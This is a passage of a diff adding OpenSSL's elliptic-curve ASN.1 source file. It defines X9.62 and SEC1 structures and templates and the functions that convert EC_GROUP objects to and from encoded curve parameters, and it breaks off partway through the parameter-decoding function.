+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include "ec_lcl.h"
+#include <openssl/err.h>
+#include <openssl/asn1t.h>
+#include <openssl/objects.h>
+
+int EC_GROUP_get_basis_type(const EC_GROUP *group)
+{
+    int i = 0;
+
+    if (EC_METHOD_get_field_type(EC_GROUP_method_of(group)) !=
+        NID_X9_62_characteristic_two_field)
+        /* everything else is currently not supported */
+        return 0;
+
+    while (group->poly[i] != 0)
+        i++;
+
+    if (i == 4)
+        return NID_X9_62_ppBasis;
+    else if (i == 2)
+        return NID_X9_62_tpBasis;
+    else
+        /* everything else is currently not supported */
+        return 0;
+}
+
+#ifndef OPENSSL_NO_EC2M
+int EC_GROUP_get_trinomial_basis(const EC_GROUP *group, unsigned int *k)
+{
+    if (group == NULL)
+        return 0;
+
+    if (EC_METHOD_get_field_type(EC_GROUP_method_of(group)) !=
+        NID_X9_62_characteristic_two_field
+        || !((group->poly[0] != 0) && (group->poly[1] != 0)
+             && (group->poly[2] == 0))) {
+        ECerr(EC_F_EC_GROUP_GET_TRINOMIAL_BASIS,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+
+    if (k)
+        *k = group->poly[1];
+
+    return 1;
+}
+
+int EC_GROUP_get_pentanomial_basis(const EC_GROUP *group, unsigned int *k1,
+                                   unsigned int *k2, unsigned int *k3)
+{
+    if (group == NULL)
+        return 0;
+
+    if (EC_METHOD_get_field_type(EC_GROUP_method_of(group)) !=
+        NID_X9_62_characteristic_two_field
+        || !((group->poly[0] != 0) && (group->poly[1] != 0)
+             && (group->poly[2] != 0) && (group->poly[3] != 0)
+             && (group->poly[4] == 0))) {
+        ECerr(EC_F_EC_GROUP_GET_PENTANOMIAL_BASIS,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+
+    if (k1)
+        *k1 = group->poly[3];
+    if (k2)
+        *k2 = group->poly[2];
+    if (k3)
+        *k3 = group->poly[1];
+
+    return 1;
+}
+#endif
+
+/* some structures needed for the asn1 encoding */
+typedef struct x9_62_pentanomial_st {
+    long k1;
+    long k2;
+    long k3;
+} X9_62_PENTANOMIAL;
+
+typedef struct x9_62_characteristic_two_st {
+    long m;
+    ASN1_OBJECT *type;
+    union {
+        char *ptr;
+        /* NID_X9_62_onBasis */
+        ASN1_NULL *onBasis;
+        /* NID_X9_62_tpBasis */
+        ASN1_INTEGER *tpBasis;
+        /* NID_X9_62_ppBasis */
+        X9_62_PENTANOMIAL *ppBasis;
+        /* anything else */
+        ASN1_TYPE *other;
+    } p;
+} X9_62_CHARACTERISTIC_TWO;
+
+typedef struct x9_62_fieldid_st {
+    ASN1_OBJECT *fieldType;
+    union {
+        char *ptr;
+        /* NID_X9_62_prime_field */
+        ASN1_INTEGER *prime;
+        /* NID_X9_62_characteristic_two_field */
+        X9_62_CHARACTERISTIC_TWO *char_two;
+        /* anything else */
+        ASN1_TYPE *other;
+    } p;
+} X9_62_FIELDID;
+
+typedef struct x9_62_curve_st {
+    ASN1_OCTET_STRING *a;
+    ASN1_OCTET_STRING *b;
+    ASN1_BIT_STRING *seed;
+} X9_62_CURVE;
+
+typedef struct ec_parameters_st {
+    long version;
+    X9_62_FIELDID *fieldID;
+    X9_62_CURVE *curve;
+    ASN1_OCTET_STRING *base;
+    ASN1_INTEGER *order;
+    ASN1_INTEGER *cofactor;
+} ECPARAMETERS;
+
+struct ecpk_parameters_st {
+    int type;
+    union {
+        ASN1_OBJECT *named_curve;
+        ECPARAMETERS *parameters;
+        ASN1_NULL *implicitlyCA;
+    } value;
+} /* ECPKPARAMETERS */ ;
+
+/* SEC1 ECPrivateKey */
+typedef struct ec_privatekey_st {
+    long version;
+    ASN1_OCTET_STRING *privateKey;
+    ECPKPARAMETERS *parameters;
+    ASN1_BIT_STRING *publicKey;
+} EC_PRIVATEKEY;
+
+/* the OpenSSL ASN.1 definitions */
+ASN1_SEQUENCE(X9_62_PENTANOMIAL) = {
+        ASN1_SIMPLE(X9_62_PENTANOMIAL, k1, LONG),
+        ASN1_SIMPLE(X9_62_PENTANOMIAL, k2, LONG),
+        ASN1_SIMPLE(X9_62_PENTANOMIAL, k3, LONG)
+} ASN1_SEQUENCE_END(X9_62_PENTANOMIAL)
+
+DECLARE_ASN1_ALLOC_FUNCTIONS(X9_62_PENTANOMIAL)
+IMPLEMENT_ASN1_ALLOC_FUNCTIONS(X9_62_PENTANOMIAL)
+
+ASN1_ADB_TEMPLATE(char_two_def) = ASN1_SIMPLE(X9_62_CHARACTERISTIC_TWO, p.other, ASN1_ANY);
+
+ASN1_ADB(X9_62_CHARACTERISTIC_TWO) = {
+        ADB_ENTRY(NID_X9_62_onBasis, ASN1_SIMPLE(X9_62_CHARACTERISTIC_TWO, p.onBasis, ASN1_NULL)),
+        ADB_ENTRY(NID_X9_62_tpBasis, ASN1_SIMPLE(X9_62_CHARACTERISTIC_TWO, p.tpBasis, ASN1_INTEGER)),
+        ADB_ENTRY(NID_X9_62_ppBasis, ASN1_SIMPLE(X9_62_CHARACTERISTIC_TWO, p.ppBasis, X9_62_PENTANOMIAL))
+} ASN1_ADB_END(X9_62_CHARACTERISTIC_TWO, 0, type, 0, &char_two_def_tt, NULL);
+
+ASN1_SEQUENCE(X9_62_CHARACTERISTIC_TWO) = {
+        ASN1_SIMPLE(X9_62_CHARACTERISTIC_TWO, m, LONG),
+        ASN1_SIMPLE(X9_62_CHARACTERISTIC_TWO, type, ASN1_OBJECT),
+        ASN1_ADB_OBJECT(X9_62_CHARACTERISTIC_TWO)
+} ASN1_SEQUENCE_END(X9_62_CHARACTERISTIC_TWO)
+
+DECLARE_ASN1_ALLOC_FUNCTIONS(X9_62_CHARACTERISTIC_TWO)
+IMPLEMENT_ASN1_ALLOC_FUNCTIONS(X9_62_CHARACTERISTIC_TWO)
+
+ASN1_ADB_TEMPLATE(fieldID_def) = ASN1_SIMPLE(X9_62_FIELDID, p.other, ASN1_ANY);
+
+ASN1_ADB(X9_62_FIELDID) = {
+        ADB_ENTRY(NID_X9_62_prime_field, ASN1_SIMPLE(X9_62_FIELDID, p.prime, ASN1_INTEGER)),
+        ADB_ENTRY(NID_X9_62_characteristic_two_field, ASN1_SIMPLE(X9_62_FIELDID, p.char_two, X9_62_CHARACTERISTIC_TWO))
+} ASN1_ADB_END(X9_62_FIELDID, 0, fieldType, 0, &fieldID_def_tt, NULL);
+
+ASN1_SEQUENCE(X9_62_FIELDID) = {
+        ASN1_SIMPLE(X9_62_FIELDID, fieldType, ASN1_OBJECT),
+        ASN1_ADB_OBJECT(X9_62_FIELDID)
+} ASN1_SEQUENCE_END(X9_62_FIELDID)
+
+ASN1_SEQUENCE(X9_62_CURVE) = {
+        ASN1_SIMPLE(X9_62_CURVE, a, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(X9_62_CURVE, b, ASN1_OCTET_STRING),
+        ASN1_OPT(X9_62_CURVE, seed, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END(X9_62_CURVE)
+
+ASN1_SEQUENCE(ECPARAMETERS) = {
+        ASN1_SIMPLE(ECPARAMETERS, version, LONG),
+        ASN1_SIMPLE(ECPARAMETERS, fieldID, X9_62_FIELDID),
+        ASN1_SIMPLE(ECPARAMETERS, curve, X9_62_CURVE),
+        ASN1_SIMPLE(ECPARAMETERS, base, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(ECPARAMETERS, order, ASN1_INTEGER),
+        ASN1_OPT(ECPARAMETERS, cofactor, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(ECPARAMETERS)
+
+DECLARE_ASN1_ALLOC_FUNCTIONS(ECPARAMETERS)
+IMPLEMENT_ASN1_ALLOC_FUNCTIONS(ECPARAMETERS)
+
+ASN1_CHOICE(ECPKPARAMETERS) = {
+        ASN1_SIMPLE(ECPKPARAMETERS, value.named_curve, ASN1_OBJECT),
+        ASN1_SIMPLE(ECPKPARAMETERS, value.parameters, ECPARAMETERS),
+        ASN1_SIMPLE(ECPKPARAMETERS, value.implicitlyCA, ASN1_NULL)
+} ASN1_CHOICE_END(ECPKPARAMETERS)
+
+DECLARE_ASN1_FUNCTIONS_const(ECPKPARAMETERS)
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(ECPKPARAMETERS, ECPKPARAMETERS)
+IMPLEMENT_ASN1_FUNCTIONS_const(ECPKPARAMETERS)
+
+ASN1_SEQUENCE(EC_PRIVATEKEY) = {
+        ASN1_SIMPLE(EC_PRIVATEKEY, version, LONG),
+        ASN1_SIMPLE(EC_PRIVATEKEY, privateKey, ASN1_OCTET_STRING),
+        ASN1_EXP_OPT(EC_PRIVATEKEY, parameters, ECPKPARAMETERS, 0),
+        ASN1_EXP_OPT(EC_PRIVATEKEY, publicKey, ASN1_BIT_STRING, 1)
+} ASN1_SEQUENCE_END(EC_PRIVATEKEY)
+
+DECLARE_ASN1_FUNCTIONS_const(EC_PRIVATEKEY)
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(EC_PRIVATEKEY, EC_PRIVATEKEY)
+IMPLEMENT_ASN1_FUNCTIONS_const(EC_PRIVATEKEY)
+
+/* some declarations of internal function */
+
+/* ec_asn1_group2field() sets the values in a X9_62_FIELDID object */
+static int ec_asn1_group2fieldid(const EC_GROUP *, X9_62_FIELDID *);
+/* ec_asn1_group2curve() sets the values in a X9_62_CURVE object */
+static int ec_asn1_group2curve(const EC_GROUP *, X9_62_CURVE *);
+/*
+ * ec_asn1_parameters2group() creates a EC_GROUP object from a ECPARAMETERS
+ * object
+ */
+static EC_GROUP *ec_asn1_parameters2group(const ECPARAMETERS *);
+/*
+ * ec_asn1_group2parameters() creates a ECPARAMETERS object from a EC_GROUP
+ * object
+ */
+static ECPARAMETERS *ec_asn1_group2parameters(const EC_GROUP *,
+                                              ECPARAMETERS *);
+/*
+ * ec_asn1_pkparameters2group() creates a EC_GROUP object from a
+ * ECPKPARAMETERS object
+ */
+static EC_GROUP *ec_asn1_pkparameters2group(const ECPKPARAMETERS *);
+/*
+ * ec_asn1_group2pkparameters() creates a ECPKPARAMETERS object from a
+ * EC_GROUP object
+ */
+static ECPKPARAMETERS *ec_asn1_group2pkparameters(const EC_GROUP *,
+                                                  ECPKPARAMETERS *);
+
+/* the function definitions */
+
+static int ec_asn1_group2fieldid(const EC_GROUP *group, X9_62_FIELDID *field)
+{
+    int ok = 0, nid;
+    BIGNUM *tmp = NULL;
+
+    if (group == NULL || field == NULL)
+        return 0;
+
+    /* clear the old values (if necessary) */
+    if (field->fieldType != NULL)
+        ASN1_OBJECT_free(field->fieldType);
+    if (field->p.other != NULL)
+        ASN1_TYPE_free(field->p.other);
+
+    nid = EC_METHOD_get_field_type(EC_GROUP_method_of(group));
+    /* set OID for the field */
+    if ((field->fieldType = OBJ_nid2obj(nid)) == NULL) {
+        ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_OBJ_LIB);
+        goto err;
+    }
+
+    if (nid == NID_X9_62_prime_field) {
+        if ((tmp = BN_new()) == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        /* the parameters are specified by the prime number p */
+        if (!EC_GROUP_get_curve_GFp(group, tmp, NULL, NULL, NULL)) {
+            ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_EC_LIB);
+            goto err;
+        }
+        /* set the prime number */
+        field->p.prime = BN_to_ASN1_INTEGER(tmp, NULL);
+        if (field->p.prime == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_ASN1_LIB);
+            goto err;
+        }
+    } else                      /* nid == NID_X9_62_characteristic_two_field */
+#ifdef OPENSSL_NO_EC2M
+    {
+        ECerr(EC_F_EC_ASN1_GROUP2FIELDID, EC_R_GF2M_NOT_SUPPORTED);
+        goto err;
+    }
+#else
+    {
+        int field_type;
+        X9_62_CHARACTERISTIC_TWO *char_two;
+
+        field->p.char_two = X9_62_CHARACTERISTIC_TWO_new();
+        char_two = field->p.char_two;
+
+        if (char_two == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        char_two->m = (long)EC_GROUP_get_degree(group);
+
+        field_type = EC_GROUP_get_basis_type(group);
+
+        if (field_type == 0) {
+            ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_EC_LIB);
+            goto err;
+        }
+        /* set base type OID */
+        if ((char_two->type = OBJ_nid2obj(field_type)) == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_OBJ_LIB);
+            goto err;
+        }
+
+        if (field_type == NID_X9_62_tpBasis) {
+            unsigned int k;
+
+            if (!EC_GROUP_get_trinomial_basis(group, &k))
+                goto err;
+
+            char_two->p.tpBasis = ASN1_INTEGER_new();
+            if (!char_two->p.tpBasis) {
+                ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            if (!ASN1_INTEGER_set(char_two->p.tpBasis, (long)k)) {
+                ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_ASN1_LIB);
+                goto err;
+            }
+        } else if (field_type == NID_X9_62_ppBasis) {
+            unsigned int k1, k2, k3;
+
+            if (!EC_GROUP_get_pentanomial_basis(group, &k1, &k2, &k3))
+                goto err;
+
+            char_two->p.ppBasis = X9_62_PENTANOMIAL_new();
+            if (!char_two->p.ppBasis) {
+                ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+
+            /* set k? values */
+            char_two->p.ppBasis->k1 = (long)k1;
+            char_two->p.ppBasis->k2 = (long)k2;
+            char_two->p.ppBasis->k3 = (long)k3;
+        } else {                /* field_type == NID_X9_62_onBasis */
+
+            /* for ONB the parameters are (asn1) NULL */
+            char_two->p.onBasis = ASN1_NULL_new();
+            if (!char_two->p.onBasis) {
+                ECerr(EC_F_EC_ASN1_GROUP2FIELDID, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        }
+    }
+#endif
+
+    ok = 1;
+
+ err:if (tmp)
+        BN_free(tmp);
+    return (ok);
+}
+
+static int ec_asn1_group2curve(const EC_GROUP *group, X9_62_CURVE *curve)
+{
+    int ok = 0, nid;
+    BIGNUM *tmp_1 = NULL, *tmp_2 = NULL;
+    unsigned char *buffer_1 = NULL, *buffer_2 = NULL,
+        *a_buf = NULL, *b_buf = NULL;
+    size_t len_1, len_2;
+    unsigned char char_zero = 0;
+
+    if (!group || !curve || !curve->a || !curve->b)
+        return 0;
+
+    if ((tmp_1 = BN_new()) == NULL || (tmp_2 = BN_new()) == NULL) {
+        ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    nid = EC_METHOD_get_field_type(EC_GROUP_method_of(group));
+
+    /* get a and b */
+    if (nid == NID_X9_62_prime_field) {
+        if (!EC_GROUP_get_curve_GFp(group, NULL, tmp_1, tmp_2, NULL)) {
+            ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+#ifndef OPENSSL_NO_EC2M
+    else {                      /* nid == NID_X9_62_characteristic_two_field */
+
+        if (!EC_GROUP_get_curve_GF2m(group, NULL, tmp_1, tmp_2, NULL)) {
+            ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+#endif
+    len_1 = (size_t)BN_num_bytes(tmp_1);
+    len_2 = (size_t)BN_num_bytes(tmp_2);
+
+    if (len_1 == 0) {
+        /* len_1 == 0 => a == 0 */
+        a_buf = &char_zero;
+        len_1 = 1;
+    } else {
+        if ((buffer_1 = OPENSSL_malloc(len_1)) == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if ((len_1 = BN_bn2bin(tmp_1, buffer_1)) == 0) {
+            ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_BN_LIB);
+            goto err;
+        }
+        a_buf = buffer_1;
+    }
+
+    if (len_2 == 0) {
+        /* len_2 == 0 => b == 0 */
+        b_buf = &char_zero;
+        len_2 = 1;
+    } else {
+        if ((buffer_2 = OPENSSL_malloc(len_2)) == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if ((len_2 = BN_bn2bin(tmp_2, buffer_2)) == 0) {
+            ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_BN_LIB);
+            goto err;
+        }
+        b_buf = buffer_2;
+    }
+
+    /* set a and b */
+    if (!M_ASN1_OCTET_STRING_set(curve->a, a_buf, len_1) ||
+        !M_ASN1_OCTET_STRING_set(curve->b, b_buf, len_2)) {
+        ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_ASN1_LIB);
+        goto err;
+    }
+
+    /* set the seed (optional) */
+    if (group->seed) {
+        if (!curve->seed)
+            if ((curve->seed = ASN1_BIT_STRING_new()) == NULL) {
+                ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        curve->seed->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07);
+        curve->seed->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+        if (!ASN1_BIT_STRING_set(curve->seed, group->seed,
+                                 (int)group->seed_len)) {
+            ECerr(EC_F_EC_ASN1_GROUP2CURVE, ERR_R_ASN1_LIB);
+            goto err;
+        }
+    } else {
+        if (curve->seed) {
+            ASN1_BIT_STRING_free(curve->seed);
+            curve->seed = NULL;
+        }
+    }
+
+    ok = 1;
+
+ err:if (buffer_1)
+        OPENSSL_free(buffer_1);
+    if (buffer_2)
+        OPENSSL_free(buffer_2);
+    if (tmp_1)
+        BN_free(tmp_1);
+    if (tmp_2)
+        BN_free(tmp_2);
+    return (ok);
+}
+
+static ECPARAMETERS *ec_asn1_group2parameters(const EC_GROUP *group,
+                                              ECPARAMETERS *param)
+{
+    int ok = 0;
+    size_t len = 0;
+    ECPARAMETERS *ret = NULL;
+    BIGNUM *tmp = NULL;
+    unsigned char *buffer = NULL;
+    const EC_POINT *point = NULL;
+    point_conversion_form_t form;
+
+    if ((tmp = BN_new()) == NULL) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (param == NULL) {
+        if ((ret = ECPARAMETERS_new()) == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    } else
+        ret = param;
+
+    /* set the version (always one) */
+    ret->version = (long)0x1;
+
+    /* set the fieldID */
+    if (!ec_asn1_group2fieldid(group, ret->fieldID)) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    /* set the curve */
+    if (!ec_asn1_group2curve(group, ret->curve)) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    /* set the base point */
+    if ((point = EC_GROUP_get0_generator(group)) == NULL) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, EC_R_UNDEFINED_GENERATOR);
+        goto err;
+    }
+
+    form = EC_GROUP_get_point_conversion_form(group);
+
+    len = EC_POINT_point2oct(group, point, form, NULL, len, NULL);
+    if (len == 0) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_EC_LIB);
+        goto err;
+    }
+    if ((buffer = OPENSSL_malloc(len)) == NULL) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if (!EC_POINT_point2oct(group, point, form, buffer, len, NULL)) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_EC_LIB);
+        goto err;
+    }
+    if (ret->base == NULL && (ret->base = ASN1_OCTET_STRING_new()) == NULL) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if (!ASN1_OCTET_STRING_set(ret->base, buffer, len)) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_ASN1_LIB);
+        goto err;
+    }
+
+    /* set the order */
+    if (!EC_GROUP_get_order(group, tmp, NULL)) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_EC_LIB);
+        goto err;
+    }
+    ret->order = BN_to_ASN1_INTEGER(tmp, ret->order);
+    if (ret->order == NULL) {
+        ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_ASN1_LIB);
+        goto err;
+    }
+
+    /* set the cofactor (optional) */
+    if (EC_GROUP_get_cofactor(group, tmp, NULL)) {
+        ret->cofactor = BN_to_ASN1_INTEGER(tmp, ret->cofactor);
+        if (ret->cofactor == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2PARAMETERS, ERR_R_ASN1_LIB);
+            goto err;
+        }
+    }
+
+    ok = 1;
+
+ err:if (!ok) {
+        if (ret && !param)
+            ECPARAMETERS_free(ret);
+        ret = NULL;
+    }
+    if (tmp)
+        BN_free(tmp);
+    if (buffer)
+        OPENSSL_free(buffer);
+    return (ret);
+}
+
+ECPKPARAMETERS *ec_asn1_group2pkparameters(const EC_GROUP *group,
+                                           ECPKPARAMETERS *params)
+{
+    int ok = 1, tmp;
+    ECPKPARAMETERS *ret = params;
+
+    if (ret == NULL) {
+        if ((ret = ECPKPARAMETERS_new()) == NULL) {
+            ECerr(EC_F_EC_ASN1_GROUP2PKPARAMETERS, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+    } else {
+        if (ret->type == 0 && ret->value.named_curve)
+            ASN1_OBJECT_free(ret->value.named_curve);
+        else if (ret->type == 1 && ret->value.parameters)
+            ECPARAMETERS_free(ret->value.parameters);
+    }
+
+    if (EC_GROUP_get_asn1_flag(group)) {
+        /*
+         * use the asn1 OID to describe the the elliptic curve parameters
+         */
+        tmp = EC_GROUP_get_curve_name(group);
+        if (tmp) {
+            ret->type = 0;
+            if ((ret->value.named_curve = OBJ_nid2obj(tmp)) == NULL)
+                ok = 0;
+        } else
+            /* we don't kmow the nid => ERROR */
+            ok = 0;
+    } else {
+        /* use the ECPARAMETERS structure */
+        ret->type = 1;
+        if ((ret->value.parameters =
+             ec_asn1_group2parameters(group, NULL)) == NULL)
+            ok = 0;
+    }
+
+    if (!ok) {
+        ECPKPARAMETERS_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+static EC_GROUP *ec_asn1_parameters2group(const ECPARAMETERS *params)
+{
+    int ok = 0, tmp;
+    EC_GROUP *ret = NULL;
+    BIGNUM *p = NULL, *a = NULL, *b = NULL;
+    EC_POINT *point = NULL;
+    long field_bits;
+
+    if (!params->fieldID || !params->fieldID->fieldType ||
+        !params->fieldID->p.ptr) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_ASN1_ERROR);
+        goto err;
+    }
+
+    /* now extract the curve parameters a and b */
+    if (!params->curve || !params->curve->a ||
+        !params->curve->a->data || !params->curve->b ||
+        !params->curve->b->data) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_ASN1_ERROR);
+        goto err;
+    }
+    a = BN_bin2bn(params->curve->a->data, params->curve->a->length, NULL);
+    if (a == NULL) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_BN_LIB);
+        goto err;
+    }
+    b = BN_bin2bn(params->curve->b->data, params->curve->b->length, NULL);
+    if (b == NULL) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_BN_LIB);
+        goto err;
+    }
+
+    /* get the field parameters */
+    tmp = OBJ_obj2nid(params->fieldID->fieldType);
+    if (tmp == NID_X9_62_characteristic_two_field)
+#ifdef OPENSSL_NO_EC2M
+    {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_GF2M_NOT_SUPPORTED);
+        goto err;
+    }
+#else
+    {
+        X9_62_CHARACTERISTIC_TWO *char_two;
+
+        char_two = params->fieldID->p.char_two;
+
+        field_bits = char_two->m;
+        if (field_bits > OPENSSL_ECC_MAX_FIELD_BITS) {
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_FIELD_TOO_LARGE);
+            goto err;
+        }
+
+        if ((p = BN_new()) == NULL) {
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        /* get the base type */
+        tmp = OBJ_obj2nid(char_two->type);
+
+        if (tmp == NID_X9_62_tpBasis) {
+            long tmp_long;
+
+            if (!char_two->p.tpBasis) {
+                ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_ASN1_ERROR);
+                goto err;
+            }
+
+            tmp_long = ASN1_INTEGER_get(char_two->p.tpBasis);
+
+            if (!(char_two->m > tmp_long && tmp_long > 0)) {
+                ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP,
+                      EC_R_INVALID_TRINOMIAL_BASIS);
+                goto err;
+            }
+
+            /* create the polynomial */
+            if (!BN_set_bit(p, (int)char_two->m))
+                goto err;
+            if (!BN_set_bit(p, (int)tmp_long))
+                goto err;
+            if (!BN_set_bit(p, 0))
+                goto err;
+        } else if (tmp == NID_X9_62_ppBasis) {
+            X9_62_PENTANOMIAL *penta;
+
+            penta = char_two->p.ppBasis;
+            if (!penta) {
+                ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_ASN1_ERROR);
+                goto err;
+            }
+
+            if (!
+                (char_two->m > penta->k3 && penta->k3 > penta->k2
+                 && penta->k2 > penta->k1 && penta->k1 > 0)) {
+                ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP,
+                      EC_R_INVALID_PENTANOMIAL_BASIS);
+                goto err;
+            }
+
+            /* create the polynomial */
+            if (!BN_set_bit(p, (int)char_two->m))
+                goto err;
+            if (!BN_set_bit(p, (int)penta->k1))
+                goto err;
+            if (!BN_set_bit(p, (int)penta->k2))
+                goto err;
+            if (!BN_set_bit(p, (int)penta->k3))
+                goto err;
+            if (!BN_set_bit(p, 0))
+                goto err;
+        } else if (tmp == NID_X9_62_onBasis) {
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_NOT_IMPLEMENTED);
+            goto err;
+        } else {                /* error */
+
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_ASN1_ERROR);
+            goto err;
+        }
+
+        /* create the EC_GROUP structure */
+        ret = EC_GROUP_new_curve_GF2m(p, a, b, NULL);
+    }
+#endif
+    else if (tmp == NID_X9_62_prime_field) {
+        /* we have a curve over a prime field */
+        /* extract the prime number */
+        if (!params->fieldID->p.prime) {
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_ASN1_ERROR);
+            goto err;
+        }
+        p = ASN1_INTEGER_to_BN(params->fieldID->p.prime, NULL);
+        if (p == NULL) {
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_ASN1_LIB);
+            goto err;
+        }
+
+        if (BN_is_negative(p) || BN_is_zero(p)) {
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_INVALID_FIELD);
+            goto err;
+        }
+
+        field_bits = BN_num_bits(p);
+        if (field_bits > OPENSSL_ECC_MAX_FIELD_BITS) {
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_FIELD_TOO_LARGE);
+            goto err;
+        }
+
+        /* create the EC_GROUP structure */
+        ret = EC_GROUP_new_curve_GFp(p, a, b, NULL);
+    } else {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_INVALID_FIELD);
+        goto err;
+    }
+
+    if (ret == NULL) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    /* extract seed (optional) */
+    if (params->curve->seed != NULL) {
+        if (ret->seed != NULL)
+            OPENSSL_free(ret->seed);
+        if (!(ret->seed = OPENSSL_malloc(params->curve->seed->length))) {
+            ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        memcpy(ret->seed, params->curve->seed->data,
+               params->curve->seed->length);
+        ret->seed_len = params->curve->seed->length;
+    }
